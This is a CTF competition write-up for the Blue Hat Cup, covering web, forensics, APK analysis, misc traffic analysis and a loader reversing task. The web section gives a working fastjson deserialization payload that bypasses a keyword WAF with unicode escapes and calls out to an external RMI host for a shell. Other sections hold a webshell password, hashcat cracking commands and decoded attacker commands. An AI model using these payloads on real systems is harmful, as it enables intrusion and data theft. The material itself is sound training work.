蓝帽杯 (Blue Hat Cup) writeup
Placed 48th, carried entirely by teammates. Another day of an RE player doing misc and forensics.
web
EZ_gadget
The challenge states the fastjson version outright, 1.2.62, for which ready-made gadget chains exist, and there is a deserialization sink.
It is roughly two steps: first get past the hashCode check, then get past the regex WAF.
The first step has shown up in an earlier CTF (java-hashcode-collisions): generate a string with the required hashCode by collision.
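As an added illustration (not part of the original writeup, and not the java-hashcode-collisions tool itself), the collision trick in Python: Java's String.hashCode() is h = 31*h + c, so any adjacent pair (c1, c2) can be swapped for (c1 + 1, c2 - 31) without changing the hash, "Aa" versus "BB" being the best-known case. The base strings at the bottom are constructed; the contest's actual target string is not on the page.

```python
import string

ALNUM = frozenset(string.ascii_letters + string.digits)


def java_hash(s: str) -> int:
    """Java String.hashCode(): h = 31*h + c over the UTF-16 code units, wrapped to a signed 32-bit int."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & 0xFFFFFFFF
    return h - 0x1_0000_0000 if h >= 0x8000_0000 else h


def collisions(s: str) -> list:
    """Strings obtained from s by rewriting one adjacent pair (c1, c2) as (c1+1, c2-31).
    Both pairs contribute 31*c1 + c2 to the hash, so it is unchanged. Only results that
    stay alphanumeric are kept, so they survive URL parameters and keyword filters."""
    out = []
    for i in range(len(s) - 1):
        if ord(s[i + 1]) < 31:
            continue
        c1, c2 = chr(ord(s[i]) + 1), chr(ord(s[i + 1]) - 31)
        if c1 in ALNUM and c2 in ALNUM:
            out.append(s[:i] + c1 + c2 + s[i + 2:])
    return out


def collision_pool(s: str, limit: int = 64) -> list:
    """Closure of collisions() starting from s, capped at `limit` strings, for when the
    first candidate is rejected by a filter and a different same-hash string is needed."""
    seen, queue = {s}, [s]
    while queue and len(seen) < limit:
        for cand in collisions(queue.pop()):
            if cand not in seen:
                seen.add(cand)
                queue.append(cand)
    seen.discard(s)
    return sorted(seen)


if __name__ == "__main__":
    # CONSTRUCTED base strings; the contest's real target is not on the page.
    for base in ("Aa", "hello", "Q7ojoxukvEpwrojA"):
        print(base, java_hash(base), collision_pool(base)[:5])
```

Any string from collision_pool() passes an equals-on-hashCode check for the original, which is all the first gate asks for; pick the one that also survives the second gate's regex.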
Second step:
String pattern = ".*rmi.*|.*jndi.*|.*ldap.*|.*\\\\x.*"; // blocks rmi/jndi/ldap and the \x hex escape, but not \u
Pattern p = Pattern.compile(pattern, 2);                // 2 == Pattern.CASE_INSENSITIVE
boolean StrMatch = p.matcher(input).matches();
if (StrMatch) {
    return "Hacker get out!!!";
}
When fastjson parses a JSON document it decodes \u unicode escapes and \x hex escapes itself and discards spaces and newlines, so the blocked keywords can be written as \u escapes (the regex only catches the \x form) or broken up with whitespace to get past the string match.
payload:
http://eci-2zea3ru6vxx8no0ork26.cloudeci1.ichunqiu.com:8888/json?str=Q7ojoxukvEpwrojA
POST:
input={"@type":"org.apache.xbean.propertyeditor.\u004a\u006e\u0064\u0069Converter","AsText":"\u0072\u006d\u0069://47.93.248.221:1099/uhd3xo"}
The shell that came back ran as a low-privileged user, so escalate via a SUID binary.
Digital forensics
Mobile forensics 1
The attachment ships a viewer exe; open it and the extraction is already done. Go straight to the pictures, find the one wanted and read off its resolution:
Mobile forensics 2
The person to identify is 姜总 (Manager Jiang); dig through the chat logs.
Website forensics 1
Drop the site source into D盾 (D-Shield) and scan it.
It flags an assert() webshell: www\runtime\temp\0f71e181346d43e56722aec663e5d4e9.php
password: lanmaobei666
Website forensics 2
Open database.php; the database password is computed by a function, so follow it.
<?php
// Decrypts the stored DB password. Needs the mcrypt extension (bundled in PHP < 7.2, PECL afterwards).
function my_encrypt(){
    $str = 'P3LMJ4uCbkFJ/RarywrCvA==';
    // The site's code strips "/r/n" rather than "\r\n"; it is a no-op here and is left as found.
    $str = str_replace(array("/r/n", "/r", "/n"), "", $str);
    $key = 'PanGuShi';
    $iv = substr(sha1($key),0,16);            // IV = first 16 hex characters of sha1(key), used as ASCII bytes
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,""); // AES-128-CBC
    mcrypt_generic_init($td, "PanGuShi", $iv); // 8-byte key, zero-padded to 16 bytes by mcrypt
    $decode = base64_decode($str);
    $dencrypted = mdecrypt_generic($td, $decode);
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    $dencrypted = trim($dencrypted);           // strips the zero padding
    return $dencrypted;
}
echo my_encrypt();
Run it and print the result:
KBLT123
Website forensics 3
A quick pass over the business logic: the amount-encryption code is in Channelorder.php under the admin controller, with obfuscation key jyzg123456.
Website forensics 4
Import the supplied SQL file into a database and use a WHERE clause to pull the records between 张宝 and 王子豪 (Userid 3 and 5); then apply the time restriction to narrow the data.
id | order_num | currency | remark | is_create_time | payee_id | payer_id | money
------+--------------+----------+--------+---------------------+----------+----------+----------
142 | 943617668819 | GG币 | | 2022-04-02 01:16:26 | 5 | 3 | mZVymm9t
144 | 588047503620 | GG币 | | 2022-04-02 01:47:16 | 5 | 3 | lpxqlXFo
150 | 597613045539 | GG币 | | 2022-04-02 02:32:02 | 5 | 3 | l5xummto
167 | 368360644631 | GG币 | | 2022-04-02 03:46:25 | 5 | 3 | m5Zwm3Bn
187 | 704008760599 | GG币 | | 2022-04-02 06:53:30 | 5 | 3 | nJhtlGlm
189 | 695829830065 | GG币 | | 2022-04-02 06:57:22 | 5 | 3 | m5tpmGtm
197 | 689591506416 | GG币 | | 2022-04-02 08:09:16 | 5 | 3 | m5ptnGtu
199 | 296524099918 | GG币 | | 2022-04-02 08:29:29 | 5 | 3 | mZlym25r
209 | 202884729901 | GG币 | | 2022-04-02 09:39:39 | 5 | 3 | m5hpnHBu
210 | 955226714946 | GG币 | | 2022-04-02 09:47:09 | 5 | 3 | m5prlm9u
227 | 421623628935 | GG币 | | 2022-04-02 12:33:01 | 5 | 3 | nJlyl2hu
245 | 228102248133 | GG币 | | 2022-04-02 15:05:53 | 5 | 3 | lptummhs
263 | 279069782487 | GG币 | | 2022-04-02 17:33:06 | 5 | 3 | lpxrl21n
317 | 911539892864 | GG币 | | 2022-04-03 00:44:48 | 5 | 3 | mZRpnHBs
358 | 940690024660 | GG币 | | 2022-04-03 06:12:18 | 5 | 3 | mZpxm2lr
371 | 703759626723 | GG币 | | 2022-04-03 08:02:01 | 5 | 3 | m5dtmGls
405 | 250826052511 | GG币 | | 2022-04-03 11:58:42 | 5 | 3 | mpxvlnBv
418 | 699369204729 | GG币 | | 2022-04-03 13:26:10 | 5 | 3 | mJpynHBt
441 | 110783516494 | GG币 | | 2022-04-03 17:08:54 | 5 | 3 | nJZwm2lu
448 | 754012259548 | GG币 | | 2022-04-03 17:41:43 | 5 | 3 | mpdtnWxq
452 | 999734985528 | GG币 | | 2022-04-03 18:54:29 | 5 | 3 | nJdtlmpr
457 | 259291480194 | GG币 | | 2022-04-03 20:24:01 | 5 | 3 | mZtymHBm
468 | 672136643928 | GG币 | | 2022-04-03 22:11:12 | 5 | 3 | nJlslmpp
486 | 995091488940 | GG币 | | 2022-04-04 00:49:53 | 5 | 3 | l5RunW1p
493 | 369911062367 | GG币 | | 2022-04-04 02:05:32 | 5 | 3 | nJxplXFm
494 | 627743356329 | GG币 | | 2022-04-04 02:14:49 | 5 | 3 | lZdpmm1s
496 | 341907225040 | GG币 | | 2022-04-04 02:21:29 | 5 | 3 | mZZwnW9u
541 | 505274522158 | GG币 | | 2022-04-04 09:38:59 | 5 | 3 | mJVrmmhp
558 | 465727738353 | GG币 | | 2022-04-04 11:36:57 | 5 | 3 | lZZwl3Bs
575 | 801973338928 | GG币 | | 2022-04-04 13:50:29 | 5 | 3 | m5xvm2hm
588 | 990446771976 | GG币 | | 2022-04-04 15:55:49 | 5 | 3 | mpZslmpm
595 | 443752577679 | GG币 | | 2022-04-04 17:12:14 | 5 | 3 | mZtrnGtp
598 | 274195438646 | GG币 | | 2022-04-04 17:52:24 | 5 | 3 | lp1rm21t
605 | 389442476686 | GG币 | | 2022-04-04 18:47:30 | 5 | 3 | nJxplmtp
651 | 840764463035 | GG币 | | 2022-04-05 01:50:13 | 5 | 3 | l5twlXFq
667 | 575571956339 | GG币 | | 2022-04-05 04:36:41 | 5 | 3 | lphqmm9s
693 | 369199269150 | GG币 | | 2022-04-05 07:36:54 | 5 | 3 | m51wmG1q
706 | 299510640482 | GG币 | | 2022-04-05 09:39:18 | 5 | 3 | mJlxlWto
731 | 660695028585 | GG币 | | 2022-04-05 13:44:39 | 5 | 3 | lJ1vmXFq
738 | 856482910335 | GG币 | | 2022-04-05 14:17:50 | 5 | 3 | mpVpmW5r
756 | 750042176098 | GG币 | | 2022-04-05 17:02:30 | 5 | 3 | m5lrlGpr
784 | 651691106346 | GG币 | | 2022-04-05 23:00:37 | 5 | 3 | mpxplm9u
786 | 255787712926 | GG币 | | 2022-04-05 23:14:45 | 5 | 3 | lZpxnHFn
791 | 135691319557 | GG币 | | 2022-04-06 00:05:58 | 5 | 3 | nJdymWpm
819 | 788431214978 | GG币 | | 2022-04-06 04:11:14 | 5 | 3 | mJpum3Fo
850 | 851409238798 | GG币 | | 2022-04-06 09:01:35 | 5 | 3 | lpRrmWto
873 | 260951952586 | GG币 | | 2022-04-06 12:48:13 | 5 | 3 | lZtunXBv
885 | 231265027253 | GG币 | | 2022-04-06 15:07:16 | 5 | 3 | lpprnWtt
930 | 262701249039 | GG币 | | 2022-04-06 21:47:06 | 5 | 3 | lJdslnBr
977 | 184134048308 | GG币 | | 2022-04-07 04:24:51 | 5 | 3 | lJZrnWpm
979 | 391202213852 | GG币 | | 2022-04-07 04:29:53 | 5 | 3 | l5Zrm21m
1004 | 325182412061 | GG币 | | 2022-04-07 08:23:24 | 5 | 3 | lJdul2hm
1009 | 145997703051 | GG币 | | 2022-04-07 08:52:54 | 5 | 3 | mphylG9q
1029 | 812286624781 | GG币 | | 2022-04-07 11:25:32 | 5 | 3 | lZhpm2pp
1051 | 932860292032 | GG币 | | 2022-04-07 15:30:43 | 5 | 3 | lZ1qnW1s
1074 | 960800718320 | GG币 | | 2022-04-07 18:13:02 | 5 | 3 | nJ1tlHFp
1079 | 309703180719 | GG币 | | 2022-04-07 18:34:31 | 5 | 3 | mZxqm2tp
1080 | 867260227199 | GG币 | | 2022-04-07 18:43:45 | 5 | 3 | mZdsm21t
1088 | 489129121639 | GG币 | | 2022-04-07 20:38:54 | 5 | 3 | mpRvlG9o
1094 | 640176750934 | GG币 | | 2022-04-07 21:18:54 | 5 | 3 | mJVqlmhv
1097 | 271657786070 | GG币 | | 2022-04-07 21:39:16 | 5 | 3 | mJRwlHBq
1119 | 895632760061 | GG币 | | 2022-04-08 00:14:36 | 5 | 3 | l5dtmWtt
1164 | 291179495316 | GG币 | | 2022-04-08 07:31:35 | 5 | 3 | mZdylHFt
1170 | 588053366224 | GG币 | | 2022-04-08 07:44:05 | 5 | 3 | l5RqlWxn
1171 | 308892834659 | GG币 | | 2022-04-08 07:50:45 | 5 | 3 | mZ1um3Fs
1181 | 712419993689 | GG币 | | 2022-04-08 08:43:06 | 5 | 3 | lJ1rnWhu
1185 | 240497645432 | GG币 | | 2022-04-08 09:19:05 | 5 | 3 | m5pulWhv
1193 | 519564426335 | GG币 | | 2022-04-08 09:57:45 | 5 | 3 | lptrnW1u
1218 | 178274213935 | GG币 | | 2022-04-08 13:23:04 | 5 | 3 | m5xynWxn
1243 | 621845480580 | GG币 | | 2022-04-08 16:30:05 | 5 | 3 | lpRynGtr
1246 | 984927062919 | GG币 | | 2022-04-08 17:09:06 | 5 | 3 | mpxulGlm
1255 | 508590678286 | GG币 | | 2022-04-08 18:22:27 | 5 | 3 | nJdslm9r
1261 | 165679472688 | GG币 | | 2022-04-08 19:09:09 | 5 | 3 | lJhslHBq
1272 | 398566701812 | GG币 | | 2022-04-08 22:03:28 | 5 | 3 | nJpwnWhu
1299 | 391669188513 | GG币 | | 2022-04-09 01:22:34 | 5 | 3 | mptql2tv
1328 | 308977433705 | GG币 | | 2022-04-09 06:27:14 | 5 | 3 | l51xmmlp
1347 | 128173141307 | GG币 | | 2022-04-09 08:52:54 | 5 | 3 | mZVymXFn
1375 | 315017222711 | GG币 | | 2022-04-09 14:06:48 | 5 | 3 | lJhqnW5q
1390 | 698730100843 | GG币 | | 2022-04-09 16:15:03 | 5 | 3 | m5ppmGpr
1394 | 454661923665 | GG币 | | 2022-04-09 16:45:28 | 5 | 3 | mZlqm21t
1446 | 770844458971 | GG币 | | 2022-04-09 23:54:25 | 5 | 3 | mpZslWxt
1461 | 336049994728 | GG币 | | 2022-04-10 01:28:10 | 5 | 3 | mJ1pnHFm
1503 | 900217499326 | GG币 | | 2022-04-10 08:16:00 | 5 | 3 | l5drlXBp
1515 | 541334504409 | GG币 | | 2022-04-10 10:10:06 | 5 | 3 | mJlvmW1u
1520 | 296235199037 | GG币 | | 2022-04-10 11:06:19 | 5 | 3 | mZtxlG5t
1522 | 961454505603 | GG币 | | 2022-04-10 11:21:05 | 5 | 3 | nJtsnHFn
1540 | 660586887840 | GG币 | | 2022-04-10 12:58:19 | 5 | 3 | l5Rvm29o
1542 | 521373859771 | GG币 | | 2022-04-10 13:02:35 | 5 | 3 | m5xvlWxv
1558 | 690490467926 | GG币 | | 2022-04-10 15:05:50 | 5 | 3 | m5Zrl2xm
1615 | 915839175755 | GG币 | | 2022-04-11 01:02:35 | 5 | 3 | mZlwlG1u
1667 | 731272590033 | GG币 | | 2022-04-11 08:17:29 | 5 | 3 | nJpvlWtr
1676 | 266051494236 | GG币 | | 2022-04-11 08:51:14 | 5 | 3 | mJxym25s
1677 | 952748053664 | GG币 | | 2022-04-11 08:51:59 | 5 | 3 | lpVqnWxv
1721 | 432188794976 | GG币 | | 2022-04-11 14:00:17 | 5 | 3 | mZVvl3Fq
1730 | 923396563975 | GG币 | | 2022-04-11 16:47:41 | 5 | 3 | lZVtlW5m
1731 | 188214551206 | GG币 | | 2022-04-11 16:48:30 | 5 | 3 | lZRqlGhn
1737 | 562343715793 | GG币 | | 2022-04-11 17:44:21 | 5 | 3 | nJxqm2hn
1788 | 723775062575 | GG币 | | 2022-04-11 23:59:53 | 5 | 3 | nJVtl21s
1814 | 437640662866 | GG币 | | 2022-04-12 04:52:14 | 5 | 3 | lJdumWlq
1847 | 261181748262 | GG币 | | 2022-04-12 08:07:42 | 5 | 3 | mJtxmGtp
1866 | 520680592708 | GG币 | | 2022-04-12 10:10:57 | 5 | 3 | mZxsnHFv
1893 | 846224640296 | GG币 | | 2022-04-12 13:45:48 | 5 | 3 | lpdtl2xn
1901 | 526823225486 | GG币 | | 2022-04-12 14:27:33 | 5 | 3 | mphqlm5p
1919 | 293881600039 | GG币 | | 2022-04-12 17:33:24 | 5 | 3 | lJdxlGpn
1986 | 252943398463 | GG币 | | 2022-04-13 02:42:54 | 5 | 3 | lpVvlHFu
2050 | 841971039165 | GG币 | | 2022-04-13 10:41:00 | 5 | 3 | lJhvmHBn
2051 | 113568559627 | GG币 | | 2022-04-13 10:46:38 | 5 | 3 | l5xunGtv
2059 | 884517377766 | GG币 | | 2022-04-13 12:12:35 | 5 | 3 | lZRul2pt
2065 | 429478659168 | GG币 | | 2022-04-13 12:47:08 | 5 | 3 | mpdqnGxu
2081 | 701817809209 | GG币 | | 2022-04-13 15:06:14 | 5 | 3 | l5Zxlmho
2093 | 648527268061 | GG币 | | 2022-04-13 17:34:17 | 5 | 3 | lJppmWhq
2118 | 346397347560 | GG币 | | 2022-04-13 21:20:16 | 5 | 3 | nJVylWpp
2121 | 598070757264 | GG币 | | 2022-04-13 21:49:38 | 5 | 3 | m5VxnWlr
2144 | 385475471817 | GG币 | | 2022-04-14 00:45:19 | 5 | 3 | lpdsnGtq
2152 | 860407002245 | GG币 | | 2022-04-14 02:02:07 | 5 | 3 | mZ1tnGpt
2175 | 876730476520 | GG币 | | 2022-04-14 07:03:09 | 5 | 3 | mJVqmmtq
2226 | 705271590445 | GG币 | | 2022-04-14 12:55:39 | 5 | 3 | l5hslWhm
2260 | 778005846695 | GG币 | | 2022-04-14 17:39:20 | 5 | 3 | lZZtl21r
2265 | 429472355879 | GG币 | | 2022-04-14 19:00:35 | 5 | 3 | nJlumGlm
2279 | 837352974915 | GG币 | | 2022-04-14 21:44:54 | 5 | 3 | lJhsmW9t
2304 | 206040245526 | GG币 | | 2022-04-15 01:40:08 | 5 | 3 | lZZym25s
2347 | 214154454225 | GG币 | | 2022-04-15 08:01:16 | 5 | 3 | l5tpnHBt
2353 | 539433927736 | GG币 | | 2022-04-15 09:22:24 | 5 | 3 | nJVunG1q
2371 | 614328206854 | GG币 | | 2022-04-15 12:43:40 | 5 | 3 | mJdtlHFu
2373 | 744073817220 | GG币 | | 2022-04-15 12:59:32 | 5 | 3 | mpVtlnFp
2386 | 472576318606 | GG币 | | 2022-04-15 15:44:12 | 5 | 3 | mplrnG1t
2393 | 905356397967 | GG币 | | 2022-04-15 16:21:55 | 5 | 3 | mJ1ylHBr
2408 | 202047690664 | GG币 | | 2022-04-15 18:52:56 | 5 | 3 | nJhynG5m
2419 | 660557237414 | GG币 | | 2022-04-15 20:02:34 | 5 | 3 | mplymG1r
2518 | 284536429033 | GG币 | | 2022-04-16 09:06:00 | 5 | 3 | lJtxlGxo
2537 | 846259865921 | GG币 | | 2022-04-16 13:46:20 | 5 | 3 | lpRxnGlm
2539 | 914271862202 | GG币 | | 2022-04-16 13:54:39 | 5 | 3 | mZxwnG5s
2569 | 230868458507 | GG币 | | 2022-04-16 18:43:11 | 5 | 3 | mZptnWpn
2592 | 580327294210 | GG币 | | 2022-04-16 22:20:02 | 5 | 3 | mJZylGxq
2601 | 113725129935 | GG币 | | 2022-04-16 23:57:42 | 5 | 3 | mZZvm3Fo
2614 | 125295831828 | GG币 | | 2022-04-17 01:33:33 | 5 | 3 | lJdxnW9t
2622 | 304246628524 | GG币 | | 2022-04-17 02:02:29 | 5 | 3 | lZtxmXFv
2636 | 949878301272 | GG币 | | 2022-04-17 04:33:37 | 5 | 3 | nJxtlXFm
2642 | 236806705755 | GG币 | | 2022-04-17 05:17:45 | 5 | 3 | mJZumW1r
2644 | 219250916132 | GG币 | | 2022-04-17 05:36:23 | 5 | 3 | nJ1tmG1p
2653 | 856797267940 | GG币 | | 2022-04-17 06:50:17 | 5 | 3 | mplslmpu
2709 | 829562956572 | GG币 | | 2022-04-17 12:14:25 | 5 | 3 | lJZxlG5p
2751 | 904086289177 | GG币 | | 2022-04-17 18:58:49 | 5 | 3 | nJtxmXBq
2796 | 568416612736 | GG币 | | 2022-04-18 00:23:41 | 5 | 3 | lZdxmmtq
2817 | 987519535765 | GG币 | | 2022-04-18 02:35:20 | 5 | 3 | lJdrlG1o
2880 | 657461012245 | GG币 | | 2022-04-18 11:18:57 | 5 | 3 | mpZtmmlm
2906 | 278546157230 | GG币 | | 2022-04-18 13:32:32 | 5 | 3 | mJVxnGpm
2921 | 999235838187 | GG币 | | 2022-04-18 14:45:06 | 5 | 3 | mJVwmWxu
2935 | 861319935688 | GG币 | | 2022-04-18 16:24:05 | 5 | 3 | mplslWps
The money column is encrypted, so a quick script to decrypt it:
<?php
header("Content-Type: text/html;charset=utf-8");
// decrypt() is the amount-decryption routine from admin/controller/Channelorder.php
// (key jyzg123456); load that file before running this.
$handle = fopen('./money.txt', 'r'); // one encrypted money value per line, as exported from the table
if (!$handle) {
    echo 'failed to open money.txt';
    exit(1);
}
while (false !== ($char = fgets($handle, 1024))) { // read the file line by line
    echo decrypt(rtrim($char, "\r\n")) . "\n";   // drop the line terminator before decrypting
}
fclose($handle);
?>
Then pull each day's exchange rate from the database:
INSERT INTO "public"."info_bargain" VALUES ('1', 'RMB', 0.05, '2022-04-01 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('2', 'RMB', 0.04, '2022-04-02 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('3', 'RMB', 0.06, '2022-04-03 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('4', 'RMB', 0.05, '2022-04-04 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('5', 'RMB', 0.07, '2022-04-05 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('6', 'RMB', 0.10, '2022-04-06 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('7', 'RMB', 0.15, '2022-04-07 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('8', 'RMB', 0.17, '2022-04-08 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('9', 'RMB', 0.23, '2022-04-09 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('10', 'RMB', 0.22, '2022-04-10 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('11', 'RMB', 0.25, '2022-04-11 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('12', 'RMB', 0.29, '2022-04-12 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('13', 'RMB', 0.20, '2022-04-13 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('14', 'RMB', 0.28, '2022-04-14 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('15', 'RMB', 0.33, '2022-04-15 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('16', 'RMB', 0.35, '2022-04-16 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('17', 'RMB', 0.35, '2022-04-17 00:00:00');
INSERT INTO "public"."info_bargain" VALUES ('18', 'RMB', 0.37, '2022-04-18 00:00:00');
A short Python script to total it gives the final figure, RMB 15758353.760000002:
total = 0
while True:
    try:
        a = float(input())          # one decrypted GG币 amount per line
    except EOFError:
        break
    total += a * 0.17               # 0.17 is the 2022-04-08 rate from info_bargain
print(total)
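The script above applies a single rate. As an added example (not the writeup's own code), here is the general per-day version: each order's rate is looked up by the date of its is_create_time, and Decimal is used so the float tail seen in 15758353.760000002 does not appear. The rate table is the info_bargain dump above; the order amounts are constructed placeholders, since the real ones only come out of the site's decrypt() routine.

```python
from decimal import Decimal

# Daily RMB rate per GG币 from info_bargain (values from the dump above); the row
# dated D applies to orders whose is_create_time falls on day D.
RATES = {
    "2022-04-01": "0.05", "2022-04-02": "0.04", "2022-04-03": "0.06",
    "2022-04-04": "0.05", "2022-04-05": "0.07", "2022-04-06": "0.10",
    "2022-04-07": "0.15", "2022-04-08": "0.17", "2022-04-09": "0.23",
    "2022-04-10": "0.22", "2022-04-11": "0.25", "2022-04-12": "0.29",
    "2022-04-13": "0.20", "2022-04-14": "0.28", "2022-04-15": "0.33",
    "2022-04-16": "0.35", "2022-04-17": "0.35", "2022-04-18": "0.37",
}

# CONSTRUCTED sample rows (is_create_time, decrypted amount in GG币). The real
# amounts come from running the site's decrypt() over the money column.
SAMPLE_ORDERS = [
    ("2022-04-02 01:16:26", "1000"),
    ("2022-04-08 07:31:35", "250.5"),
    ("2022-04-08 22:03:28", "100"),
    ("2022-04-18 16:24:05", "10"),
]


def rate_for(ts: str) -> Decimal:
    """Return the rate in force on the calendar day of an is_create_time value."""
    day = ts[:10]
    if day not in RATES:
        raise KeyError(f"no rate recorded for {day}")
    return Decimal(RATES[day])


def total_rmb(orders, start=None, end=None) -> Decimal:
    """Sum amount * day-rate over orders, optionally restricted to an inclusive
    [start, end] range of YYYY-MM-DD days (ISO dates compare correctly as strings)."""
    total = Decimal(0)
    for ts, amount in orders:
        day = ts[:10]
        if (start and day < start) or (end and day > end):
            continue
        total += Decimal(amount) * rate_for(ts)
    return total


if __name__ == "__main__":
    print(total_rmb(SAMPLE_ORDERS))
    print(total_rmb(SAMPLE_ORDERS, "2022-04-08", "2022-04-08"))
```

Feed it the (is_create_time, decrypted money) pairs from the payer_id = 3 / payee_id = 5 query, with start and end set to the range the question asks about.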
Program analysis 1
An RE player's self-cultivation (
Install the APK and read the package name from Settings.
Program analysis 2
A quick look in jadx.
Program analysis 3
This is the only thing that even remotely looks like ciphertext.
Program analysis 4
Close call, almost didn't find it; there are only those few classes.
It's a
the one with the thread and so on
Computer forensics 1
Parse the memory image with vol.
Crack 7f21caca5685f10d9e849cc84c340528
as an MD5:
anxinqi
Computer forensics 2
取证大师 (Forensics Master)
pid 2192
Dump the two keys while at it.
Computer forensics 3
Mount the disk image in 取证大师 and decrypt it with the BitLocker key.
Inside are two txt files (one is an image, the other a password list), a Word document and a PPT.
Convert the PPT into a hash with this:
http://www.wendanghuifu.com/freetools/office2john.html
The hashcat example-hash page shows which mode the Office 2007 format maps to (9400):
https://hashcat.net/wiki/doku.php?id=example_hashes
hashcat -m 9400 -a 0 hash.txt pass.txt -o output.txt
Same for the Word file.
$office$*2007*20*128*16*ae5cec7759d56eba49f6e923a4657c6c*5c91c78a0990d6c1791b3d6577056ada*a1b73a76fb87442b4ecc8f9b3702784312f8a7e2:287fuweiuhfiute
$office$*2007*20*128*16*86ba49293df8e9dfba55e68b7b8e132d*2a264ead0c29fb1bfadbc763491f873b*660c537a244f02d816fbd299f73e60b7c68212c6:688561
Both passwords crack; open the PPT and it's the flag.
Computer forensics 4
Select the key obtained earlier
and decrypt the image.
Load the decrypted image in 取证大师 again.
Ha, it has a password.
Brute-force it with john.
991314; extract it and that's the flag.
MISC
misc1
Payload analysis: the payload runs commands via base64.
Base64-decode the last parameter of the previous payload:
YNY2QgL2QgImM6XFxXaW5kb3dzXFxUZW1wIiZyYXIuZXhlIGEgLVBTZWNyZXRzUGFzc3cwcmRzIDEucmFyIDEudHh0JmVjaG8gZWZhOTIzYmE1MDQmY2QmZWNobyAxYTRiZTg4MTVlZjg=
Strip the first two characters and base64-decode again:
cd /d "c:\Windows\Temp"&rar.exe a -PSecretsPassw0rds 1.rar 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
That gives the archive password SecretsPassw0rds.
Export the archive from the pcap and extract it,
then submit the NTLM hash.
misc2
Much the same as misc1: find the payload carrying the compression command,
again remembering to strip the two leading characters,
and use the password to extract the archive.
https://www.freebuf.com/sectool/176876.html
Follow that article.
Note it is the hash of the previous password; find hash02 and submit it.
RE (post-contest reproduction)
LOADER
This is a reproduction; during the contest I was rushed and only worked out part of the function, some adds and subtracts I think.
Redoing it properly now.
The main function calls VirtualProtect:
BOOL VirtualProtect(
LPVOID lpAddress,
DWORD dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
lpAddress: start address of the memory whose protection is to be changed.
dwSize: size of the region.
flNewProtect: the new protection; PAGE_EXECUTE_READWRITE (0x40) makes the pages readable, writable and executable.
lpflOldProtect: where the previous protection value is stored.
Returns non-zero on success and 0 on failure.
Dump the bytes out directly.
exeinfo identifies them;
patch the header back to amd64 and PE64 in 010 Editor.
Then black-box debug it dynamically and work out the function logic (no rush, take it slowly).
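Restoring amd64/PE64 in the header amounts to two field writes, shown here as an added example that is not from the original writeup: the Machine field of IMAGE_FILE_HEADER becomes IMAGE_FILE_MACHINE_AMD64 (0x8664) and the Magic that opens the optional header becomes IMAGE_NT_OPTIONAL_HDR64_MAGIC (0x20B). The script builds a constructed minimal PE header carrying the i386/PE32 values and patches it, which is the same edit done by hand in 010 Editor. Caveat: this only restores fields that were deliberately mangled on a genuine 64-bit image; it cannot turn a real PE32 into PE32+, because the two optional-header layouts differ.

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B


def header_offsets(data: bytes) -> tuple:
    """Locate the Machine and OptionalHeader.Magic fields via e_lfanew."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine_off = e_lfanew + 4        # Machine is the first field of IMAGE_FILE_HEADER
    magic_off = e_lfanew + 4 + 20     # IMAGE_FILE_HEADER is 20 bytes; Magic opens the optional header
    return machine_off, magic_off


def pe_info(data: bytes) -> tuple:
    """Return (Machine, Magic), the two values exeinfo-style identification keys on."""
    machine_off, magic_off = header_offsets(data)
    return (struct.unpack_from("<H", data, machine_off)[0],
            struct.unpack_from("<H", data, magic_off)[0])


def fix_pe64(data: bytes) -> bytes:
    """Write AMD64 / PE32+ back into a header whose fields were tampered with."""
    machine_off, magic_off = header_offsets(data)
    buf = bytearray(data)
    struct.pack_into("<H", buf, machine_off, IMAGE_FILE_MACHINE_AMD64)
    struct.pack_into("<H", buf, magic_off, IMAGE_NT_OPTIONAL_HDR64_MAGIC)
    return bytes(buf)


def build_sample(machine: int, magic: int) -> bytes:
    """CONSTRUCTED minimal PE header (DOS stub + NT headers, no sections) for the demo."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew: NT headers right after the stub
    file_header = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0xF0, 0x22)
    optional = struct.pack("<H", magic) + bytes(0xF0 - 2)   # SizeOfOptionalHeader = 0xF0 for PE32+
    return bytes(dos) + b"PE\0\0" + file_header + optional


if __name__ == "__main__":
    tampered = build_sample(IMAGE_FILE_MACHINE_I386, IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    print("before:", [hex(v) for v in pe_info(tampered)])
    print("after: ", [hex(v) for v in pe_info(fix_pe64(tampered))])
```

On the real dump, read the file with open(path, "rb").read(), pass it through fix_pe64() and write the result to a new file; check pe_info() on the output before loading it into the debugger.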